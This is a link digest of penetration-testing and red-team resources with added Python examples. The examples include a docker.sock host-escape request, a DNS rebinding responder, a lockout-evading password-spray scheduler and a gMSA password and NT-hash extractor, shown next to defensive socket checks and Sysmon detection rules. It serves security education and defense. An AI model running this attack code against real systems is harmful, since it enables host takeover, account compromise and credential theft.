Memory Resident Implants - Code injection is alive and well (BlueHat v18)
Video: https://www.youtube.com/watch?v=02fL2xpR7IM
Slides: https://www.slideshare.net/MSbluehat/bluehat-v18-memory-resident-implants-code-injection-is-alive-and-well
#pentest #redteaming #infosec #evasion
Samit Anwer, Citrix
Each Android app runs in its own VM, with every VM allocated a limited heap size for creating new objects. Neither the app nor the OS differentiates between regular objects and objects that contain security sensitive information like…
Mario & Luigi - Tools for sniffing Windows Named Pipes communication
https://github.com/OmerYa/Named-Pipe-Sniffer
#pentest #infosec
Roll your own Ngrok with Nginx, Letsencrypt, and SSH reverse tunnelling
Ngrok is a fantastic tool for creating a secure tunnel from the public web to a machine behind NAT or a firewall. Sadly, it costs money and it’s proprietary. If you’re a developer, odds are that you’re already renting a server in the public cloud, so why not roll your own ngrok?
https://jerrington.me/posts/2019-01-29-self-hosted-ngrok.html
#pivoting #pentest #redteam
THE DANGER OF EXPOSING DOCKER.SOCK. Exposing /var/run/docker.sock could lead to full environment takeover.
https://dejandayoff.com/the-danger-of-exposing-docker.sock/
#docker #pentest
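Added example, not code from the linked post: why a reachable /var/run/docker.sock is the same as root on the host, and a check for containers that were handed the socket. The image name, the command run through chroot and the docker-inspect output are constructed for illustration.

```python
"""Added example (not from the linked post): Engine API call that turns a
mounted docker.sock into host root, plus a check over `docker inspect`
output for containers that have the socket. Image, command and the sample
inspect data are assumptions."""
import http.client
import json
import socket

DOCKER_SOCK = "/var/run/docker.sock"


class UnixHTTPConnection(http.client.HTTPConnection):
    """http.client over an AF_UNIX socket, the same thing `curl --unix-socket` does."""

    def __init__(self, path):
        super().__init__("localhost")
        self.unix_path = path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.unix_path)


def host_escape_spec(image="alpine:latest", command="id > /tmp/pwned"):
    """Body for POST /containers/create: bind-mount the host root filesystem
    and run a command inside it via chroot. Anyone who can talk to the socket
    may submit this; no daemon vulnerability is involved."""
    return {
        "Image": image,
        "Cmd": ["chroot", "/host", "sh", "-c", command],
        "HostConfig": {"Binds": ["/:/host"], "Privileged": True},
    }


def create_container(spec, sock_path=DOCKER_SOCK):
    """Submit the spec to the daemon; returns (HTTP status, parsed JSON body)."""
    conn = UnixHTTPConnection(sock_path)
    conn.request("POST", "/containers/create", body=json.dumps(spec),
                 headers={"Content-Type": "application/json"})
    resp = conn.getresponse()
    return resp.status, json.loads(resp.read() or b"{}")


def socket_exposures(inspect_output):
    """Defensive check over `docker inspect $(docker ps -q)`: every container
    with the daemon socket bind-mounted. A :ro mount does not help, because
    the socket is connected to, not written as a file."""
    hits = []
    for container in inspect_output:
        for mount in container.get("Mounts", []):
            if mount.get("Source") == DOCKER_SOCK:
                hits.append({
                    "name": container["Name"].lstrip("/"),
                    "destination": mount.get("Destination"),
                    "rw": mount.get("RW", True),
                })
    return hits


# Constructed `docker inspect` output: two containers, one of them exposed.
SAMPLE_INSPECT = [
    {"Name": "/web", "Mounts": [
        {"Type": "volume", "Source": "webdata", "Destination": "/data", "RW": True}]},
    {"Name": "/ci-agent", "Mounts": [
        {"Type": "bind", "Source": "/var/run/docker.sock",
         "Destination": "/var/run/docker.sock", "RW": True}]},
]

if __name__ == "__main__":
    print(json.dumps(host_escape_spec(), indent=2))
    for hit in socket_exposures(SAMPLE_INSPECT):
        print("exposed:", hit)
```

Run it inside a container to see whether the socket is there; the create call only matters if it is, and the inspect check is what to run on the host side before someone else does.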
Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine.
https://github.com/nccgroup/singularity
#dns #pentest
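Added example, not Singularity's code: the DNS half of a rebinding attack, hand-built on the wire format so it runs offline. The attacker and target addresses, the hostname and the flip-after-one-answer policy are assumptions (Singularity offers several flipping strategies); the web-server half that serves the attack page is not shown.

```python
"""Added example (not from the nccgroup/singularity project): a minimal
rebinding DNS responder. Addresses, hostname and flip policy are assumed."""
import struct
from collections import defaultdict

QTYPE_A, QCLASS_IN = 1, 1


def build_query(qname, txid=0x1234):
    """Minimal recursion-desired A query, as a stub resolver would send it."""
    packet = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    for label in qname.split("."):
        packet += bytes([len(label)]) + label.encode("ascii")
    return packet + b"\x00" + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def parse_query(packet):
    """Return (txid, qname, qtype, offset just past the question section)."""
    txid, _flags, qdcount = struct.unpack_from("!HHH", packet, 0)
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    offset, labels = 12, []
    while packet[offset] != 0:
        length = packet[offset]
        labels.append(packet[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length
    offset += 1
    qtype, _qclass = struct.unpack_from("!HH", packet, offset)
    return txid, ".".join(labels), qtype, offset + 4


def build_answer(query, ip, ttl=0):
    """Authoritative response with one A record for the queried name.
    TTL 0 is the point: the client must ask again, and the next answer can differ."""
    txid, _qname, qtype, qend = parse_query(query)
    if qtype != QTYPE_A:
        raise ValueError("only A queries are handled in this example")
    header = struct.pack("!HHHHHH", txid, 0x8580, 1, 1, 0, 0)  # QR AA RD RA
    rr = struct.pack("!HHHIH", 0xC00C, QTYPE_A, QCLASS_IN, ttl, 4)  # ptr to qname
    rr += bytes(int(octet) for octet in ip.split("."))
    return header + query[12:qend] + rr


def answer_ip(response):
    """Pull the A record back out of a response built above (for checking)."""
    _txid, _qname, _qtype, qend = parse_query(response)
    return ".".join(str(b) for b in response[qend + 12:qend + 16])


class RebindingResolver:
    """First answer(s) for a name point at the attacker's web server so the
    victim loads the attack page; later answers point at the target, so the
    page's JavaScript now reaches it under the same origin."""

    def __init__(self, attacker_ip, target_ip, flip_after=1):
        self.attacker_ip, self.target_ip = attacker_ip, target_ip
        self.flip_after = flip_after
        self.seen = defaultdict(int)

    def resolve(self, query):
        _txid, qname, _qtype, _end = parse_query(query)
        self.seen[qname] += 1
        ip = self.attacker_ip if self.seen[qname] <= self.flip_after else self.target_ip
        return build_answer(query, ip, ttl=0)


if __name__ == "__main__":
    resolver = RebindingResolver("203.0.113.10", "127.0.0.1")
    q = build_query("rebind.attacker.example")
    for _ in range(3):
        print(answer_ip(resolver.resolve(q)))
```

Browsers pin DNS results for a while regardless of TTL, which is why real frameworks need a strategy for forcing the second lookup (cache flooding, multiple answers, or simply waiting); the resolver above only models the authoritative side.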
Password Spraying- Common mistakes and how to avoid them
When password spraying attacks are executed, coordinated and scoped properly during an authorized engagement, they can identify and illustrate the dangers of weak passwords and show how dangerous even one legacy Internet-facing endpoint can be.
https://medium.com/@adam.toscher/password-spraying-common-mistakes-and-how-to-avoid-them-3fd16b1a352b
#pentest #redteaming
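Added example, not from the linked article: a spray schedule that stays under the domain lockout policy, plus a simulator of the per-account bad-password counter to prove it. The policy values, password list and user list are constructed; the point is the mistake the article warns about, which is spraying faster than the observation window resets.

```python
"""Added example (not the article's code): lockout-aware spray planning
and a counter simulation. Policy values and word lists are assumptions."""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class LockoutPolicy:
    """Mirrors the `net accounts` / Default Domain Policy fields."""
    threshold: int                  # bad attempts before lockout, 0 = never
    observation_window: timedelta   # "Reset account lockout counter after"


def attempts_per_window(policy, margin=2):
    """Stay at least `margin` below the threshold (None when there is no lockout)."""
    if policy.threshold == 0:
        return None
    return max(policy.threshold - margin, 1)


def plan_spray(passwords, policy, start, margin=2, slack=timedelta(minutes=5)):
    """Return [(when, password)], batching passwords so no account sees more
    than attempts_per_window() failures inside one observation window. Each
    batch waits a full window plus slack after the previous one, because the
    counter resets relative to the LAST bad attempt, not the first."""
    per_batch = attempts_per_window(policy, margin) or len(passwords)
    schedule = []
    for index, password in enumerate(passwords):
        batch, _slot = divmod(index, per_batch)
        when = start + batch * (policy.observation_window + slack)
        schedule.append((when, password))
    return schedule


def max_counter(schedule, policy):
    """Simulate the bad-password counter for one user who gets every password
    wrong; returns the highest value it reaches (>= threshold means lockout)."""
    counter, last_bad, peak = 0, None, 0
    for when, _password in sorted(schedule):
        if last_bad is not None and when - last_bad >= policy.observation_window:
            counter = 0
        counter += 1
        last_bad = when
        peak = max(peak, counter)
    return peak


def normalize_users(raw):
    """Dedupe the user list so one person is not sprayed twice:
    DOMAIN\\user, user@domain and case variants collapse to one entry."""
    seen = set()
    for entry in raw:
        name = entry.strip().split("\\")[-1].split("@")[0].lower()
        if name and name not in seen:
            seen.add(name)
            yield name


if __name__ == "__main__":
    policy = LockoutPolicy(threshold=5, observation_window=timedelta(minutes=30))
    words = ["Winter2019!", "Summer2019!", "Company123", "Password1",
             "Welcome1", "Spring2019!", "Autumn2019!"]           # constructed
    start = datetime(2019, 6, 1, 9, 0)
    for when, word in plan_spray(words, policy, start):
        print(when.strftime("%H:%M"), word)
    print("peak counter, planned:", max_counter(plan_spray(words, policy, start), policy))
    print("peak counter, all at once:", max_counter([(start, w) for w in words], policy))
```

Read the policy before the first attempt (`net accounts /domain`, or the lockout attributes on the domain object); a threshold of 0 is not a licence to go fast, since an ADFS or mail gateway in front of the endpoint may enforce its own.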
Great collection of my Penetration Testing scripts, tools, cheatsheets collected over years, used during real-world assignments or collected from various good quality sources.
https://github.com/mgeeky/Penetration-Testing-Tools
#cheatsheets #pentest
Next Gen Phishing – Leveraging Azure Information Protection -
How to use Azure Information Protection (AIP) to improve phishing campaigns from the perspective of an attacker
https://www.trustedsec.com/2019/04/next-gen-phishing-leveraging-azure-information-protection/
#phishing #azure #pentest #redteam
Vulmap is an open source local vulnerability scanner: scripts for Windows and Linux that inventory installed software on the host and check it against an online vulnerability database. They can be used defensively for vulnerability assessment, or by pentesters/red teamers to find privilege escalation paths.
https://github.com/vulmon/Vulmap
#scanning #pentest
Penetration Testing (eCPPT) Notes and SOP
https://github.com/TacticThreat/PenetrationTesting-Notes
#cheatsheet #pentest
Osmedeus
Fully automated offensive security tool for reconnaissance and vulnerability scanning. Osmedeus runs a collection of well-known recon and vulnerability scanning tools against the target as one automated workflow.
https://github.com/j3ssie/Osmedeus
#recon #bugbounty #pentest
Kerberos cheatsheet
A cheatsheet with commands that can be used to perform kerberos attacks:
- Bruteforcing
- ASREPRoast
- Kerberoasting
- Overpass The Hash/Pass The Key (PTK)
- Pass The Ticket (PTT)
- Silver / Golden ticket
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
#pentest #redteaming #kerberos #windows #ad
Check-LocalAdminHash
Check-LocalAdminHash is a PowerShell tool that attempts to authenticate to multiple hosts over either WMI or SMB using a password hash to determine if the provided credential is a local administrator. It's useful if you obtain a password hash for a user and want to see where they are local admin on a network. It is essentially a Frankenstein of two of my favorite tools along with some of my own code.
https://github.com/dafthack/Check-LocalAdminHash
#redteaming #pentest #ad #windows
Docker for Pentesters
My hope in this post is to demonstrate some of my usecases and workflows, and illustrate how I think pentesters and security professionals in general can greatly benefit from Docker.
https://blog.ropnop.com/docker-for-pentesters/
#docker #pentest
Python for Pentesters
Getting started with Python for pentesting and red team engagements is fairly easy! This repo is just a small collection of random scripts to help get you started.
https://github.com/ustayready/python-pentesting
#python #tools #pentest
Extracting credentials from a remote Windows system - Living off the Land
Recently we performed a red teaming engagement where we wanted to dump the credentials from a remote host. We got the credentials of a user which has administrative privileges on the victim host and wanted to get more credentials from that host. Because we felt that the blue team was closely observing the environment this needed to be done in a stealthy manner and preferably only involving native Windows tooling. That is when we came up with the following approach in order to obtain a remote system’s SYSTEM, SECURITY and SAM files from %SystemRoot%\System32\Config making use of WMI and SMB. This approach can also be used to obtain the ntds.dit file from a Domain Controller in order to obtain the credentials of the complete organization.
https://bitsadm.in/blog/extracting-credentials-from-remote-windows-system
#windows #redteaming #pentest #evasion
Attacking Active Directory Group Managed Service Accounts (GMSAs)
User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically changed. This means that the GMSA has to have security principals explicitly delegated to have access to the clear-text password. This is where it can get tricky.
https://adsecurity.org/?p=4367
#ad #windows #pentest
In May 2020, I presented some Active Directory security topics in a Trimarc Webcast called "Securing Active Directory: Resolving Common Issues" and included some information I put together relating to the security of AD Group Managed Service Accounts (GMSA).…
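Added example, not from the adsecurity.org post: what a principal that is allowed to read a gMSA's msDS-ManagedPassword attribute actually receives, and why "explicitly delegated" matters. The blob layout follows MSDS-MANAGEDPASSWORD_BLOB from MS-ADTS as I understand it and should be treated as an assumption; the sample password and intervals are constructed, and the NT-hash helper returns None where OpenSSL has no MD4 provider.

```python
"""Added example (not the post's code): parse the msDS-ManagedPassword blob a
delegated principal reads from AD. Layout per MS-ADTS as recalled; sample
data is constructed."""
import hashlib
import struct

HEADER = struct.Struct("<HHIHHHH")  # Version, Reserved, Length, four offsets
TICKS_PER_SECOND = 10_000_000       # intervals are 100-nanosecond units


def _wstr_at(blob, offset):
    """Null-terminated UTF-16LE string starting at offset (None if offset is 0)."""
    if offset == 0:
        return None
    end = offset
    while end + 1 < len(blob) and blob[end:end + 2] != b"\x00\x00":
        end += 2
    if blob[end:end + 2] != b"\x00\x00":
        raise ValueError("unterminated password string")
    return blob[offset:end]


def parse_managed_password(blob):
    """Return current/previous password bytes and the two rotation intervals."""
    version, _reserved, length, cur_off, prev_off, query_off, unchanged_off = \
        HEADER.unpack_from(blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a version-1 MSDS-MANAGEDPASSWORD_BLOB")
    query_ticks, = struct.unpack_from("<Q", blob, query_off)
    unchanged_ticks, = struct.unpack_from("<Q", blob, unchanged_off)
    return {
        "current": _wstr_at(blob, cur_off),       # raw UTF-16LE, usually 256 bytes
        "previous": _wstr_at(blob, prev_off),     # present only around rotation
        "next_query_seconds": query_ticks // TICKS_PER_SECOND,
        "unchanged_seconds": unchanged_ticks // TICKS_PER_SECOND,
    }


def nt_hash(password_utf16le):
    """NT hash is MD4 over the UTF-16LE bytes; enough for pass-the-hash as the gMSA."""
    try:
        return hashlib.new("md4", password_utf16le).hexdigest()
    except ValueError:          # MD4 not available in this OpenSSL build
        return None


def build_managed_password(current, previous=None, next_query_seconds=0, unchanged_seconds=0):
    """Constructed blob in the same layout, so the parser can be exercised offline."""
    body = current + b"\x00\x00"
    cur_off, prev_off = HEADER.size, 0
    if previous is not None:
        prev_off = HEADER.size + len(body)
        body += previous + b"\x00\x00"
    while (HEADER.size + len(body)) % 8:          # align the QWORD intervals
        body += b"\x00"
    query_off = HEADER.size + len(body)
    unchanged_off = query_off + 8
    body += struct.pack("<QQ", next_query_seconds * TICKS_PER_SECOND,
                        unchanged_seconds * TICKS_PER_SECOND)
    length = HEADER.size + len(body)
    return HEADER.pack(1, 0, length, cur_off, prev_off, query_off, unchanged_off) + body


if __name__ == "__main__":
    sample = build_managed_password("S3cret-gMSA-pass".encode("utf-16-le"),
                                    next_query_seconds=86400, unchanged_seconds=2592000)
    parsed = parse_managed_password(sample)
    print(parsed["current"].decode("utf-16-le"), parsed["next_query_seconds"], nt_hash(parsed["current"]))
```

The attribute is only returned over an LDAP connection that is sealed (LDAPS or signing/sealing), and only to principals in msDS-GroupMSAMembership; auditing that list, rather than the gMSA's password age, is the check the post is driving at.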
ABUSING WINDOWS TELEMETRY FOR PERSISTENCE
Today we’re going to talk about a persistence method that takes advantage of some of the wonderful telemetry that Microsoft has included in Windows versions for the last decade. The process outlined here affects Windows machines from 2008R2/Windows 7 through 2019/Windows 10.
https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/
#windows #persistence #redteaming #pentest
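Added example covering two of the posts above, the bitsadm.in remote hive dump and the TrustedSec telemetry persistence: detection logic run over constructed, simplified Sysmon events (real Sysmon is XML in EVTX; the key=value lines here are invented so it runs offline). The registry path is the TelemetryController key the TrustedSec technique abuses as I recall it, and the reg.exe-under-WmiPrvSE pattern is my reading of the bitsadm.in approach; both are assumptions to verify against the posts.

```python
"""Added example (not either post's code): two detection rules over
constructed Sysmon-like events. Event format and registry path are assumed."""
import re

TELEMETRY_KEY = "\\AppCompatFlags\\TelemetryController\\"
HIVES = ("HKLM\\SAM", "HKLM\\SECURITY", "HKLM\\SYSTEM")


def parse_event(line):
    """'EventID=1|Image=C:\\...|CommandLine=...' -> dict (constructed format)."""
    return dict(field.split("=", 1) for field in line.rstrip("\n").split("|"))


def is_hive_dump(event):
    """Sysmon 1 (process create): reg.exe saving SAM/SECURITY/SYSTEM. A
    WmiPrvSE.exe parent means it was launched remotely over WMI."""
    if event.get("EventID") != "1":
        return None
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    if not image.endswith("\\reg.exe") or not re.search(r"\bsave\b", cmd, re.I):
        return None
    hives = [h for h in HIVES if h.lower() in cmd.lower()]
    if not hives:
        return None
    remote = event.get("ParentImage", "").lower().endswith("\\wmiprvse.exe")
    return {"technique": "hive dump", "hives": hives, "remote_wmi": remote}


def is_telemetry_persistence(event):
    """Sysmon 13 (registry value set): a Command value under a TelemetryController
    subkey, which CompatTelRunner.exe will later execute on the attacker's behalf."""
    if event.get("EventID") != "13":
        return None
    target = event.get("TargetObject", "")
    lowered = target.lower()
    if TELEMETRY_KEY.lower() not in lowered or not lowered.endswith("\\command"):
        return None
    return {"technique": "telemetry persistence", "key": target,
            "command": event.get("Details", "")}


def scan(lines):
    """Apply both rules to each event; returns the list of findings in order."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        event = parse_event(line)
        for rule in (is_hive_dump, is_telemetry_persistence):
            hit = rule(event)
            if hit:
                findings.append(hit)
    return findings


# Constructed events: a remote hive dump, a benign reg query, the persistence
# Command value, and the harmless Nightly DWORD set beside it.
SAMPLE_EVENTS = """\
EventID=1|Image=C:\\Windows\\System32\\reg.exe|ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe|CommandLine=reg save HKLM\\SAM C:\\Windows\\Temp\\sam.hiv
EventID=1|Image=C:\\Windows\\System32\\reg.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=reg query HKLM\\SAM
EventID=13|Image=C:\\Windows\\regedit.exe|TargetObject=HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Updater\\Command|Details=C:\\Users\\Public\\update.exe
EventID=13|Image=C:\\Windows\\System32\\svchost.exe|TargetObject=HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Updater\\Nightly|Details=DWORD (0x00000001)
""".splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The hive-dump rule pairs naturally with a Sysmon 11 (file create) rule for the resulting .hiv files and an SMB read of them from the admin share, which is the second half of the bitsadm.in technique; the persistence rule should also alert on CompatTelRunner.exe spawning anything outside System32.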
ntlm_theft: A file payload generator for forced ntlm hash disclosure
Greetings fellow security enthusiast! Today I want to introduce you to a new security tool I’ve written called ntlm_theft, which is now available on GitHub. It’s a tool which generates a number of known filetypes (18 at time of writing), which can be used by an attacker to trick users into disclosing their NetNTLMv2 hashes.
> https://medium.com/greenwolf-security/ntlm-theft-a-file-payload-generator-for-forced-ntlm-hash-disclosure-2d5f1fe5b964
> https://github.com/Greenwolf/ntlm_theft
#windows #ntlm #tools #pentest